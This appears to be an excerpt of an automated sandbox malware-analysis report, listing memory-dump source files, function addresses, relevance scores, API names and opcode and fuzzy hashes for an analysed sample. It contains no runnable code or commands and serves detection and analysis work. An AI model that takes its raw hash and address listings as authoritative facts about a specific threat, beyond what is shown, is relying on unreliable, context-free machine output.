                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151680680.0000000000284000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151699291.0000000000289000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151726942.000000000029E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151748641.00000000002A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151768479.00000000002A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151786460.00000000002AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151805122.00000000002AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151825913.00000000002B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151852238.00000000002B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151874517.00000000002B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151901567.00000000002C6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151928483.00000000002C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151956717.00000000002CF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151979173.00000000002D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151999880.00000000002D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152022406.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152050708.00000000002E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152072352.00000000002E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152072352.000000000031D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152136326.0000000000337000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152160407.0000000000338000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152183065.000000000034C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152203849.000000000034D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152224214.000000000034E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152248990.0000000000353000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152269027.0000000000355000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152290652.0000000000363000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152309411.0000000000365000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AttributesFile
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3188754299-0
                                                                                                                                                                                                                                                                            • Opcode ID: 148508faf629ae98acd8f908ff8d8c0af23b4eca7b0d4004d3623557e3a408c9
                                                                                                                                                                                                                                                                            • Instruction ID: 3b6f7780952154ce26796fadc93a56f5969701870463bc4e30cc2ad17a413267
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 148508faf629ae98acd8f908ff8d8c0af23b4eca7b0d4004d3623557e3a408c9
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F2C0803401910445F51C4538515442632455B0B75B3F08B58DC316B1E1DB32D80FC790
                                                                                                                                                                                                                                                                            Function 0005B1A0 Relevance: 1.5, APIs: 1, Instructions: 244COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CoInitialize.OLE32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 0005B3C8
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2150495137.0000000000051000.00000040.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2150171763.0000000000050000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2150495137.00000000000B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2150804554.00000000000B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2150890075.00000000000BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2150919180.00000000000C7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151162610.000000000021C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151190617.000000000021E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151232379.0000000000236000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151232379.0000000000242000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151289980.000000000024D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151319542.000000000024E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151399260.000000000025E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151427420.000000000025F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151502289.0000000000272000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151528684.0000000000273000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151551208.0000000000274000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151604752.0000000000275000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151642466.000000000027D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151662777.0000000000282000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151680680.0000000000284000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151699291.0000000000289000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151726942.000000000029E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151748641.00000000002A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151768479.00000000002A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151786460.00000000002AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151805122.00000000002AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151825913.00000000002B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151852238.00000000002B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151874517.00000000002B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151901567.00000000002C6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151928483.00000000002C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151956717.00000000002CF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151979173.00000000002D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151999880.00000000002D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152022406.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152050708.00000000002E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152072352.00000000002E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152072352.000000000031D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152136326.0000000000337000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152160407.0000000000338000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152183065.000000000034C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152203849.000000000034D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152224214.000000000034E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152248990.0000000000353000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152269027.0000000000355000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152290652.0000000000363000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152309411.0000000000365000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Initialize
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2538663250-0
                                                                                                                                                                                                                                                                            • Opcode ID: 3bff51813e9ee18ad13a196c418033487b9ae7df09f0edd807a32decbbdc9327
                                                                                                                                                                                                                                                                            • Instruction ID: ace800694dd65924e1d66e3791c2f19d748f2dc6570b70dc222dcf8b8c51b03f
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3bff51813e9ee18ad13a196c418033487b9ae7df09f0edd807a32decbbdc9327
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CFB11770A10268DFEB28CF14CD98BDEB7B5EF15304F5085D9E80A67281D775AA88CF91
                                                                                                                                                                                                                                                                            Function 04A70CE1 Relevance: 1.3, Strings: 1, Instructions: 86COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2154853703.0000000004A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A70000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_4a70000_file.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: %
                                                                                                                                                                                                                                                                            • API String ID: 0-2567322570
                                                                                                                                                                                                                                                                            • Opcode ID: 8f9930e8ff3ee5ad60659643e3ee24e0c3d80480a4de35b76115a567d776a8c9
                                                                                                                                                                                                                                                                            • Instruction ID: c114e3cbb144ad7620f95450af6c7ef91c0f9e6d2a200558b6e99289f60e3c21
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8f9930e8ff3ee5ad60659643e3ee24e0c3d80480a4de35b76115a567d776a8c9
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 91118EBB24C215BD6252D5866F249FB7B7EE9C7730330C47AF843C6403F2966659A232
                                                                                                                                                                                                                                                                            Function 04A70DC4 Relevance: .3, Instructions: 302COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2154853703.0000000004A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A70000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_4a70000_file.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 045787dd1b8f69ddc9e8498028916d20f41933e013b7f0ef8374df94dc651cd7
                                                                                                                                                                                                                                                                            • Instruction ID: c3fe736cd36544155f94e161c10fa2d14692e62a810b6742212250e525de4a09
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 045787dd1b8f69ddc9e8498028916d20f41933e013b7f0ef8374df94dc651cd7
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2FF055A361D3401DD603ADB5C9084B73F78EA93330332CA97D081CA053F154A886C3A0
                                                                                                                                                                                                                                                                            Function 04A70C81 Relevance: .1, Instructions: 121COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2154853703.0000000004A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A70000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_4a70000_file.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 97ce4ed210a53ec3359899cc9dea7cbedd1e56afaa2b6e5d3837529e28b03921
                                                                                                                                                                                                                                                                            • Instruction ID: eb2c1daa7fcd149d7add182e3e5035cee01417e0a13d9719798ed24426aa8a43
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 97ce4ed210a53ec3359899cc9dea7cbedd1e56afaa2b6e5d3837529e28b03921
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2F1159FB34D220BD706295862F24AFB6B3EE5C6730331C43AF843D6403F2952A4A6172
                                                                                                                                                                                                                                                                            Function 04A70CA1 Relevance: .1, Instructions: 109COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2154853703.0000000004A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A70000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_4a70000_file.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 8721964dec9ac364c14acb08e0a2c763afe86c9641d67a52dc882441abc752af
                                                                                                                                                                                                                                                                            • Instruction ID: 6b801a8c74bdcb198c23bddc9a98744c0ccbed4229a6b9b3b3862ff318af6260
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8721964dec9ac364c14acb08e0a2c763afe86c9641d67a52dc882441abc752af
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1C116DFB34D221BD316295866F249FB6E3EE5C6730331C42AF843C6403F2866A496172
                                                                                                                                                                                                                                                                            Function 04A70CB1 Relevance: .1, Instructions: 103COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2154853703.0000000004A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A70000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_4a70000_file.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 388c4a84d42abb50fb30a884a9415e35bc2cefde91c32f1e16164fb3c3ae00a9
                                                                                                                                                                                                                                                                            • Instruction ID: 3ecb4e6c402346e52524394a1c549b1ee2e77d19d451e027850b2d8ed9f3fb39
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 388c4a84d42abb50fb30a884a9415e35bc2cefde91c32f1e16164fb3c3ae00a9
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 531151FB24D210BD715385866F249F76B7EE5C7730331C466F847D6503F29A2A496132
                                                                                                                                                                                                                                                                            Function 04A70CC6 Relevance: .1, Instructions: 93COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2154853703.0000000004A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A70000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_4a70000_file.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 5ee547d34e7e87838561729e0ead1b209dd9fa2f04b820fd8abbe9eee95cd128
                                                                                                                                                                                                                                                                            • Instruction ID: 516ff4613efdbdcb6a2d7f48d57cc02ebde13530f5e1aefce10c17a15497d819
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5ee547d34e7e87838561729e0ead1b209dd9fa2f04b820fd8abbe9eee95cd128
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B91179FB34C260BD616285866F249FA7B3EE5C7730331C466F843D6803F2962A4A6132
                                                                                                                                                                                                                                                                            Function 04A70D1C Relevance: .1, Instructions: 58COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2154853703.0000000004A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A70000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_4a70000_file.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 874e0caf3e607d239cd4e195e1e4a77e19ab3990e6aa199bc115470dcce8fea3
                                                                                                                                                                                                                                                                            • Instruction ID: eed1acbfbbc972dfc8528174cb0efec6e151eca3c9defebccbc479526c7dc2e6
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 874e0caf3e607d239cd4e195e1e4a77e19ab3990e6aa199bc115470dcce8fea3
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 93F090FB24C220BD216285852F209F77B7EF5C7B30331C526F847C6403E2A56A49B132
                                                                                                                                                                                                                                                                            Function 04A70D37 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2154853703.0000000004A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A70000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_4a70000_file.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 0cef28a31dc26ef43aae41dd03938d3a58940bf1985dc65f0c78c8be611dd165
                                                                                                                                                                                                                                                                            • Instruction ID: 8141b64137c9a799992e2fcc10ac5e03b7c7412573d7635f4bf7823dce280f17
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0cef28a31dc26ef43aae41dd03938d3a58940bf1985dc65f0c78c8be611dd165
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1CF0A0FB30C250BD7162D1513F20AF7673CE6C6B30731C42AF806D2443E59929896032
                                                                                                                                                                                                                                                                            Function 04A70D5A Relevance: .0, Instructions: 31COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2154853703.0000000004A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A70000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_4a70000_file.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 177e9e1b493037b5f11599d417b9490111e0c6a103a1a4ddc0a78fa7c818ab8d
                                                                                                                                                                                                                                                                            • Instruction ID: 565a3ca2af809577ff9b742fda04f6df0af50ac89a12e8cc0a8e776f07dcd643
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 177e9e1b493037b5f11599d417b9490111e0c6a103a1a4ddc0a78fa7c818ab8d
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 49E0DFBB31CA10EE51A2CA44AE519B7777DFACAB30331C49AF882C7002E6657450A632
                                                                                                                                                                                                                                                                            Function 04A70D75 Relevance: .0, Instructions: 29COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2154853703.0000000004A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A70000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_4a70000_file.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 92dd34a554a9f7cb73c38702bfbd836fd32f07ea43a733d27e44e15628568d38
                                                                                                                                                                                                                                                                            • Instruction ID: b7f540e340b6b240480fffe10dc58fdb7082fa582be66ffd21c886e72fe41228
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 92dd34a554a9f7cb73c38702bfbd836fd32f07ea43a733d27e44e15628568d38
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9BE0267730C2009E826295502F141F6773AA5C6330331C096F442C6143E5A63508D322
                                                                                                                                                                                                                                                                            Function 04A70D98 Relevance: .0, Instructions: 25COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2154853703.0000000004A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A70000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_4a70000_file.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: fe5b5b085e1ac552ff94ea36c184ce43f335bdef02a416a5b447b959d7169cb4
                                                                                                                                                                                                                                                                            • Instruction ID: dc22867a3991467d821a2879e962ce8dbf46a0bc4615c00115e12a4485893e4a
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fe5b5b085e1ac552ff94ea36c184ce43f335bdef02a416a5b447b959d7169cb4
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 76D05EBB64C040BE5242E9A2AA6C6FA7E2DE5C6A30331899AE44286402B482989591A0

                                                                                                                                                                                                                                                                            Non-executed Functions

                                                                                                                                                                                                                                                                            Function 000931A8 Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1340COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2150495137.0000000000051000.00000040.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2150171763.0000000000050000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2150495137.00000000000B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2150804554.00000000000B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2150890075.00000000000BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2150919180.00000000000C7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151162610.000000000021C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151190617.000000000021E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151232379.0000000000236000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151232379.0000000000242000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151289980.000000000024D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151319542.000000000024E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151399260.000000000025E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151427420.000000000025F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151502289.0000000000272000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151528684.0000000000273000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151551208.0000000000274000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151604752.0000000000275000.00000040.00000001.01000000.00000003.sdmpDownload File
